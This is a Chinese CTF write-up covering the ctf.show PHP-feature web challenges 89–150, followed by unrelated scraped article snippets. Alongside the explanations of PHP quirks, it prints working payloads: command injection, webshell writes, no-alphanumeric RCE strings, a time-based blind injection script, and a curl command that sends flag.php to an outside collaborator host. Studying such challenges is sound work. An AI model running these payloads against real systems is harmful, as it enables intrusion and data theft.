ctf_show笔记篇(web入门---php特性)

news/2024/5/19 21:56:21 标签: android, ctf, php, linux

目录

php%E7%89%B9%E6%80%A7-toc" style="margin-left:0px;"> php特性

89:直接数组绕过preg_match当遇到数组时会直接报错输出0

90:这里利用了intval的特性

91:这里需要细节一点

92-93:这两题的方法很多可以发散思维

94:还是利用小数绕过例如4476.0

95:这里在最前面使用%0a或者随便一个其他的添加一个字节隔离开在使用八进制就可以绕过

php%E4%BC%AA%E5%8D%8F%E8%AE%AE%E6%88%96%E8%80%85.%2Fflag.php%E7%BB%95%E8%BF%87-toc" style="margin-left:40px;">96:可用php伪协议或者./flag.php绕过

97:简单的数组绕过

php%E4%B8%89%E5%85%83%E8%BF%90%E7%AE%97%E7%AC%A6-toc" style="margin-left:40px;">98:php三元运算符

99:in_array函数漏洞

100:没有设置什么过滤直接命令执行就好###101题的弱化版

101:ReflectionClass 建立反射类

102:还是写一句话木马进服务器

php%E6%94%B9%E4%B8%BA%3C%3F%3D%E5%B0%B1%E5%A5%BD%EF%BC%8C%E8%BF%99%E4%B8%AA%E7%AD%89%E5%90%8C%E4%BA%8E%3C%3Fphp%20echo-toc" style="margin-left:40px;">113:和102同理只是把php改为

114:随便上传两个相同的字符

105:考察变量覆盖

106:这里直接可以用数组绕过,和绕过MD5一样,都是sha加密

107:parse_str函数

​编辑

108:简单绕过

109:这里学到了利用反序列化的__construct魔法函数来利用

php%E7%9A%84%E5%86%85%E7%BD%AE%E5%87%BD%E6%95%B0FilesystemIterator%E7%9A%84%E5%88%A9%E7%94%A8-toc" style="margin-left:40px;">110:php的内置函数FilesystemIterator的利用

php%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F-toc" style="margin-left:40px;">111:直接利用php的全局变量

php%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E5%8F%96-toc" style="margin-left:40px;">112和114:直接利用php伪协议读取

113:is_file函数能处理的长度有限制

115:

php%E4%B8%AD%E5%8F%82%E6%95%B0%E5%8A%A0'.'%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2%E6%8E%89%EF%BC%8C%E9%99%A4%E9%9D%9E%E5%8F%82%E6%95%B0%E4%B8%AD%E5%90%AB%E6%9C%89'%2B'%E6%88%96%E8%80%85'%E7%A9%BA%E6%A0%BC'%E6%88%96%E8%80%85'%5B%20%5D'%E8%BF%99%E4%BA%9B%2C%E8%BF%99%E4%BA%9B%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2%E4%B8%BA'_'%2C%E5%B9%B6%E4%B8%94%E4%BF%9D%E7%95%99'.'%E8%BF%99%E4%B8%80%E7%B1%BB%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2%E6%8E%89%E7%9A%84%E7%AC%A6%E5%8F%B7-toc" style="margin-left:40px;">123:在php中参数加'.'会被替换掉,除非参数中含有'+'或者'空格'或者'[ ]'这些,这些会被替换为'_',并且保留'.'这一类会被替换掉的符号

125:和123差不多,但是过滤更干净了,利用函数嵌套

126:这里利用到了$a=$_SERVER['argv'];

php%E7%9A%84%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87-toc" style="margin-left:40px;">127:利用php的特性绕过

128:新知识点

129:stripos(1,2)查找2在1中第一次出现的位置

130:直接绕过,0相当于FALLS

131:关于PHP正则的溢出

php%E7%9A%84%E9%80%BB%E8%BE%91%E8%BF%90%E7%AE%97%E7%AC%A6-toc" style="margin-left:40px;">132:关于php的逻辑运算符

133:利用变量覆盖再利用curl可以传输文件信息

134:$_POST是个幌子

135:这里同样可以用curl来解,利用反斜杠绕过就可以,前提是他没有禁用反斜杠

136:tee命令,可以实现输出又能输入到文件

137:call_user_func()函数调用方法

138:相当于禁用了::

139:命令盲注###这里有个问题,{}这个括号可能跑不出来要自己加

140:让传入的两个函数运行后是0或者false或空

php%E8%AE%A1%E7%AE%97%E6%9D%A5%E7%BB%95%E8%BF%87return-toc" style="margin-left:40px;">141:利用php计算来绕过return

142:0乘任何数都为0

143:这里和141同理,但是将取反的符号过滤了,所以这里用异或

144:也是同样的只是稍微绕了一下(使用取反,异或,或,都可以)

php%E7%9A%84if%E5%87%BD%E6%95%B0%E7%9A%84%E5%8F%98%E5%BC%8F%E6%9D%A5%E7%BB%95%E8%BF%87-toc" style="margin-left:40px;">145:这里其他都还是和143-144一样,只是使用php的if函数的变式来绕过

146:'|','^'同样也可以当作运算符用来绕过return

php%E5%91%BD%E4%BB%A4%E7%A9%BA%E9%97%B4-toc" style="margin-left:40px;">147:涉及两个知识点create_function的代码注入以及php命令空间

148:异或绕过即可或者非预期

php%E4%B8%AD%E6%8F%92%E5%85%A5%E6%9C%A8%E9%A9%AC-toc" style="margin-left:40px;">149:条件竞争或者直接在index.php中插入木马

150:这里有多种方法可以解,非预期、日志文件包含、session文件包含、临时文件上传###这里演示一种

phpinfo%E6%9D%A5%E8%BF%9B%E8%A1%8C%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E5%88%9B%E5%BB%BAwebshell%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A-toc" style="margin-left:40px;"> 150_plus:这一题利用phpinfo来进行条件竞争创建webshell在服务器上


php%E7%89%B9%E6%80%A7"> php特性

89:直接数组绕过preg_match当遇到数组时会直接报错输出0

90:这里利用了intval的特性

payload:

num=4476%0a

4476%0a不绝对等于4476应为%0a相当于是空格

但是intval(4476%0a,0)这里intval函数用于获取变量的整数值,所以会排除掉%0a所以

intval(4476%0a,0)===4476

intval(a,b)

如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的

91:这里需要细节一点

/m会多行匹配意思就是

a

php

这样也能匹配到

而这里就只能匹配第一行所以能绕过

92-93:这两题的方法很多可以发散思维

  1. 利用intval可以计算其他进制来绕过,例如使用八进制   payload:010574
  2. 或者利用intval取整的特性4476.1####92题不行
  3. 92题可以使用16进制绕过

94:还是利用小数绕过例如4476.0

这里不知道为什么4476.0可以但是4476.1或者4476.2其他的数字不行

95:这里在最前面使用%0a或者随便一个其他的添加一个字节隔离开在使用八进制就可以绕过

payload:

%0a010574

php%E4%BC%AA%E5%8D%8F%E8%AE%AE%E6%88%96%E8%80%85.%2Fflag.php%E7%BB%95%E8%BF%87">96:可用php伪协议或者./flag.php绕过

97:简单的数组绕过

原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL

解法2:利用明文不同但是hashi值相同的两个字符串

php%E4%B8%89%E5%85%83%E8%BF%90%E7%AE%97%E7%AC%A6">98:php三元运算符

三元运算符就是php的if函数的变式:

例如:$a = $b == 3?4:5;   等同于if($b == 3){$a = 4}else{$a == 5}

$_GET?$_GET=&$_POST:'flag';

等于if($_GET){$_GET=&$_POST}else{'flag'}

解析:当通过get方式传入参数时就把get传入参数改为post传入参数

$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';

因为已经表名了当通get传参直接变成POST传参所以这里应该变为

if($_POST['flag']=='flag'){$_POST=&$_COOKIE}else{'flag'}

解析:只要有通过post传输参数flag=flag,那么POST传入参数改为COOKIE传入参数

$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';

还是同理,因为了通过post传输参数flag=flag直接变成COOKIE传参所以这里应该变为

if($_COOKIE['flag']=='flag'){$_COOKIE=&_SERVER}else{'flag'}

解析:只要有通过COOKIE传输参数flag=flag,那么COOKIE传入参数改为SERVER传入参数

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

最后这里

highlight_file(if($_SERVER['HTTP_FLAG']=='flag'){$flag}else{__FILE__})

所以最后payload:

  1. ?a=1               ####随便传入一个get引用第一个方法将$_GET传参改为$_POST
  2. post传参:flag=flag       ####将$_POST传参改为$_COOKIE
  3. Cookie: flag=flag         ####将$_COOKIE传参改为$_SERVER
  4. Flag: flag          ####获取到flag

99:in_array函数漏洞

当type参数没有设置的话他不会检查数据和数组的类型是否相同

例如:

in_array(1.abc,1),一个是字符串一个是数组,但是没有设置第三个参数,就可以形成自动转换,1.abc自动转换为1

100:没有设置什么过滤直接命令执行就好###101题的弱化版

payload1:

?v1=21&v2=var_dump($ctfshow)/*&v3=*/;

payload2:

?v1=1&v2=system('ls')/*&v3=*/;

payload3:

?v1=1&v2=cp ctfshow.php 1.txt/*&v3=*/;    ####访问1.txt就可以访问

101:ReflectionClass 建立反射类

从提示可知少给了一位flag,拿到bp爆破就好

102:还是写一句话木马进服务器

substr(a,b)函数是一个截取函数,a是需要被截取的字符串,b是需要从第几位开始截取###从零开始数

call_user_func函数类似于一种特别的调用函数的方法

file_put_contents函数是一个写入字符串进文件的函数,也可以通过此函数创建文件并写入东西

构造payload:

php%E6%94%B9%E4%B8%BA%3C%3F%3D%E5%B0%B1%E5%A5%BD%EF%BC%8C%E8%BF%99%E4%B8%AA%E7%AD%89%E5%90%8C%E4%BA%8E%3C%3Fphp%20echo">113:和102同理只是把php改为<?=就好,这个等同于<?php echo

114:随便上传两个相同的字符

105:考察变量覆盖

foreach函数:通过get传入?a=b那么通过foreach函数使$key=a而$value=b

$$key=$$value,这里的意思就是把原本的值当作变量名用了

这里的就相当于是$$key=$$value    <>    $a=$b

106:这里直接可以用数组绕过,和绕过MD5一样,都是sha加密

107:parse_str函数

这里会通过parse_str把$v1的值给$v2有点像赋值

给v1传入flag=1,赋值以后,$v2=([flag] => 1)

108:简单绕过

ereg(a,b)类似于搜索,a是条件类似于正则,b使字符串如果b中有a的要求的东西则输出真

ereg函数存在NULL截断漏洞,导致了正则过滤被绕过

strrev()是取反函数传入abc返回cba这种

109:这里学到了利用反序列化的__construct魔法函数来利用

__cddonstruct魔法函数当使用new实例化一个对象的时候就会引用

payload:

v1=

class{

    public function __construct(){

        system('ls')

    }

}

v2=1

连起来就是echo new (class{public function __construct(){system('ls')}}1())

php%E7%9A%84%E5%86%85%E7%BD%AE%E5%87%BD%E6%95%B0FilesystemIterator%E7%9A%84%E5%88%A9%E7%94%A8">110:php的内置函数FilesystemIterator的利用

FilesystemIterator()可以读取指定的目录文件

fetcwd()可以获取当前目录的路径

php%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F">111:直接利用php的全局变量

php%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E5%8F%96">112和114:直接利用php伪协议读取

113:is_file函数能处理的长度有限制

解答1:

/proc/self/root表示根目录

利用这个多次添加让is_file函数认为这不是个文件

解答2:

php中的zip伪协议

官方用法compress.zlib://file.gz         compress.zlib://file.bz2

115:

trim()函数用于移除字符串两侧的空格

这里利用%0c绕过相当于是<,并且并不会被trim过滤掉,并且输入的参数还是int型

php%E4%B8%AD%E5%8F%82%E6%95%B0%E5%8A%A0'.'%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2%E6%8E%89%EF%BC%8C%E9%99%A4%E9%9D%9E%E5%8F%82%E6%95%B0%E4%B8%AD%E5%90%AB%E6%9C%89'%2B'%E6%88%96%E8%80%85'%E7%A9%BA%E6%A0%BC'%E6%88%96%E8%80%85'%5B%20%5D'%E8%BF%99%E4%BA%9B%2C%E8%BF%99%E4%BA%9B%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2%E4%B8%BA'_'%2C%E5%B9%B6%E4%B8%94%E4%BF%9D%E7%95%99'.'%E8%BF%99%E4%B8%80%E7%B1%BB%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2%E6%8E%89%E7%9A%84%E7%AC%A6%E5%8F%B7">123:在php中参数加'.'会被替换掉,除非参数中含有'+'或者'空格'或者'[ ]'这些,这些会被替换为'_',并且保留'.'这一类会被替换掉的符号

125:和123差不多,但是过滤更干净了,利用函数嵌套

126:这里利用到了$a=$_SERVER['argv'];

$_SERVER['argv']:

传递给该脚本的参数的数组。脚本以命令行方式运行时,argv变量传递给程序C语言样式的命令行参数。当通过GET方式调用时,该变量包含query string。

大致来说就是会把接收的数据变成数组,数据用分隔号隔开例如+之类的

payload:

get:$a=a+fl0g=flag_give_me

post=CTF_SHOW=2&CTF[SHOW.COM=1&fun=parse_str($a[1])

这里通过$_SERVER['argv']给$a指定了他的方式

第一个参数$_SERVER['argv'][0]是脚本名,其余的是传递给脚本的参数(例如这样的$a[1])

parse_str函数:

php%E7%9A%84%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87">127:利用php的特性绕过

$_SERVER['QUERY_STRING']获取 URL 数据并使用 PHP 中的 Explode 函数将数据转换为数组

128:新知识点

_()==gettext() 是gettext()的拓展函数,开启text扩展。需要php扩展目录下有php_gettext.dll

get_defined_vars — 返回由所有已定义变量所组成的数组 这样可以获得 $flag

129:stripos(1,2)查找2在1中第一次出现的位置

利用目录穿越例如/ctfshow/../../../etc/passwd

130:直接绕过,0相当于FALLS

131:关于PHP正则的溢出

当存在这样的情况时可能会出现正则溢出的情况

例如:

原字符:abcd                正则:.*?d

这里的.*?会率先匹配第一个字符a但是他选择先不匹配,因为是非贪婪模式(在可以匹配和不匹配之间优先选择不匹配),这里会把选择权给d,d回去匹配下一个字符b,如果不匹配选择权又会回到.*?去匹配b,但是还是因为非贪婪模式,不回去直接匹配,又把选择权给d,直到匹配到最后一个字符d才会停下

import requests

url = r'http://a3835817-be92-4fb2-ba94-2db402037f5a.challenge.ctf.show/'

data = {
    'f': 'aaaaaaaa'*130000+'36Dctfshow'
}

a = requests.post(url=url, data=data)
print(a.text)

php%E7%9A%84%E9%80%BB%E8%BE%91%E8%BF%90%E7%AE%97%E7%AC%A6">132:关于php的逻辑运算符

对于“与”(&&) 运算: x && y 当xfalse时,直接跳过,不执行y
对于“或”(||) 运算 :   x||y 当xtrue时,直接跳过,不执行y

133:利用变量覆盖再利用curl可以传输文件信息

payload:`$F`;+curl -X POST -F a=flag.php https://lj8u9k8tr39ry1cpwrqhz7ndd4jx7nvc.oastify.com

134:$_POST是个幌子

$_SERVER['QUERY_STRING']:

这里会获取url里?后面的数据

parse_str():

将这样的a=1&b=2给附上值,变成$a=1  $b=2

extract():

把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b])    <==>    b=c

135:这里同样可以用curl来解,利用反斜杠绕过就可以,前提是他没有禁用反斜杠

136:tee命令,可以实现输出又能输入到文件

例如:cat flag.php|tee 1       看flag.php文件又能输出到文件1里

137:call_user_func()函数调用方法

调用类里的方法时

array("a","b")   <==>   a::b

138:相当于禁用了::

但是call_user_func(array("a","b"))使用array创建数组调用类里面的方法

所以传输的时候可以使用变式,直接传数组

例如:a[0]=a     a[1]=b       这样和使用array来创建数组是相同的

139:命令盲注###这里有个问题,{}这个括号可能跑不出来要自己加

ls / -1  自动换行     awk  "NR==1"  取第一排      cut -c 1  取第一个

if [ a == b ];then echo 123;fi     if的[]里必须有间隔不然会报错,如果a等于b执行then echo 123,错误则执行fi

import requests

url = r"http://16c540da-b9a6-4523-bccd-019f974cb794.challenge.ctf.show/?c="
flag1 = "qwertyuiopasdfghjklzxcvbnm_-=+[]{};\':\",./<>?123456789."
flag = ""

for i in range(1, 6):
    for a in range(1, 32):
        for b in flag1:
            payload = f"if [ `ls / -1|awk \"NR=={i}\"|cut -c {a}` == \"{b}\" ];then sleep 4;fi"
            try:
                requests.get(url=url+payload, timeout=3)
            except:
                flag += b
                print(flag)
                break

140:让传入的两个函数运行后是0或者false或空

php%E8%AE%A1%E7%AE%97%E6%9D%A5%E7%BB%95%E8%BF%87return">141:利用php计算来绕过return

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

/^\W+$/ 作用是匹配非数字字母下划线的字符

可使用取反来绕过

php"><?php

echo urlencode(~'system');
echo '  ';
echo urlencode(~'\'ls\''

1-phpinfo()-1  =  2       return在输出计算结果的同时,也会把phpinfo()的结果输出

payload:v1=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8)-

142:0乘任何数都为0

143:这里和141同理,但是将取反的符号过滤了,所以这里用异或

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

144:也是同样的只是稍微绕了一下(使用取反,异或,或,都可以)

只是把v2和v3换了个位置,给v2赋值‘-’

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

php%E7%9A%84if%E5%87%BD%E6%95%B0%E7%9A%84%E5%8F%98%E5%BC%8F%E6%9D%A5%E7%BB%95%E8%BF%87">145:这里其他都还是和143-144一样,只是使用php的if函数的变式来绕过

1?a:b

等同于

if 1{

a;

}else{

b;

}

payload:

(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%d5)

system  cat f*

146:'|','^'同样也可以当作运算符用来绕过return

php%E5%91%BD%E4%BB%A4%E7%A9%BA%E9%97%B4">147:涉及两个知识点create_function的代码注入以及php命令空间

create_function的代码注入###本函数已自 PHP 7.2.0 起被废弃,并自 PHP 8.0.0 起被移除

此函数在内部执行  eval(),因此具有跟  eval() 相同的安全问题,就是因为他创建匿名函数的同时会内部执行eval,就会直接将里面的参数全部执行了

​​​例如:
create_function(a,b)
等同于
function xxx(a){
b
}
php命令空间
在PHP中普通的调用函数方式相当于是调用的相对路径,例如调用create_function,其实是调用的\create_function此路径的函数,在php中可以自定义命名空间,但是最基本的命名空间就是调用\下面的函数

148:异或绕过即可或者预期解

php%E4%B8%AD%E6%8F%92%E5%85%A5%E6%9C%A8%E9%A9%AC">149:条件竞争或者直接在index.php中插入木马

150:这里有多种方法可以解,非预期、日志文件包含、session文件包含、临时文件上传###这里演示一种

日志文件包含:

这里需要vip这个变量等于1  isvip函数才会返回true才能最后利用到这里的include函数

php">if($isVIP && strrpos($ctf, ":")===FALSE){
    include($ctf);
}
而要让isVIP这个变量赋值为1,需要利用到extract函数####这里134题也讲过

extract():

把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b])    <==>    b=c

phpinfo%E6%9D%A5%E8%BF%9B%E8%A1%8C%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89%E5%88%9B%E5%BB%BAwebshell%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A"> 150_plus:这一题利用phpinfo来进行条件竞争创建webshell在服务器上

class_exists检查类是否被定义

__autoload — 尝试加载未定义的类会被调用

利用extract(..CTFSHOW..);来覆盖$__CTFSHOW__

####关于符号  ' . '  这个在之前做过解释,在php里,变量如果使用特殊字符如'['和'.'还有空格这一类的,会自动被加载为_

这里似乎被删减过,只要找到phpinfo就能获得flag

最后payload:?..CTFSHOW..=phpinfo

但是这里还是要对这个条件竞争做一个笔记

这里是vuhub上做出的解释

##不理解为什么会出现临时文件可以去看这篇无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

大致来讲就是,通过post传入参数时同时上传的文件会被服务器存为临时文件,但在每次执行完命令之后就会立马删除,必须要在它没删除之前访问它才能让他保留,但这种情况几乎不存在,所以需要卡bug,通过phpinfo页面来增加他执行完成的时间,上面有原理。


http://www.niftyadmin.cn/n/5403847.html

相关文章

一周学会Django5 Python Web开发-Django5详细视图DetailView

锋哥原创的Python Web开发 Django5视频教程&#xff1a; 2024版 Django5 Python web开发 视频教程(无废话版) 玩命更新中~_哔哩哔哩_bilibili2024版 Django5 Python web开发 视频教程(无废话版) 玩命更新中~共计28条视频&#xff0c;包括&#xff1a;2024版 Django5 Python we…

AtCoder ABC343 A-D题解

Problem A: 签到题。 #include <bits/stdc.h> using namespace std; int main(){int A,B;cin>>A>>B;for(int i0;i<10;i){if(i!(AB))cout<<i<<endl;//记得return} } Problem B: 依旧签到。 include <bits/stdc.h> using namespace …

概率基础——多元正态分布

概率基础——多元正态分布 介绍 多元正态分布是统计学中一种重要的多维概率分布&#xff0c;描述了多个随机变量的联合分布。在多元正态分布中&#xff0c;每个随机变量都服从正态分布&#xff0c;且不同随机变量之间可能存在相关性。本文将以二元标准正态分布为例&#xff0…

ReactNative进阶(四十三)iOS项目Xcode本地联调

文章目录 一、前言二、本地联调三、拓展阅读 一、前言 项目组应用RN技术栈开发ios应用后&#xff0c;应用jenkins实现ipa组包及功能验证&#xff0c;过程耗时。故迫切需要实现iOS应用本地热部署&#xff0c;为此离开不了Xcode。作为非原生开发&#xff0c;特梳理此文。 开发环…

解决vscode内置视图npm脚本操作报权限问题

项目背景 当我们使用 vscode 运行NPM脚本时却爆红了&#xff0c;提示系统上禁止运行脚本。 解决思路 竟然提示权限不够&#xff0c;那么咱们就从系统权限出发&#xff0c;vscode右键以管理员身份运行 在集成终端中输入一下命令 # get-executionpolicy是PowerShell中的命令,用…

电子电气架构——汽车DoIP诊断通信建立流程

电子电气架构——汽车DoIP诊断通信建立流程 我是穿拖鞋的汉子,魔都中坚持长期主义的工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 人们会在生活中不断攻击你。他们的主要武器是向你灌输对自己的怀疑:你的价值、你的能力、你的潜力。他们往往会…

DDOS攻击为何永不过时?

文章目录 一、DOS二、DDOS三、如何防范DDOS 1.可以过滤IP地址2.增加设备3.在骨干节点配置防火墙4.开启过滤5.配置DNS抗攻击6.白帽团队 四、白帽子 为什么二十年前中国红客们就在用的DDOS攻击直到现在还依然是黑客们最爱的攻击方法&#xff1f;二十年前的攻击技术为什么还不过…

获取Flink作业在HDFS上保存的最新的savepoint文件路径

获取Flink作业在HDFS上保存的最新的savepoint文件路径 代码&#xff1a; savepoint$(hadoop fs -ls hdfs://xxxApp/flink-checkpoints/xxxflinkjob/*/chk-*/_metadata |grep -vw Found |sort -k6,7 -r |head -n 1 |awk {print $8})上面的代码是一个Shell命令&#xff0c;用于…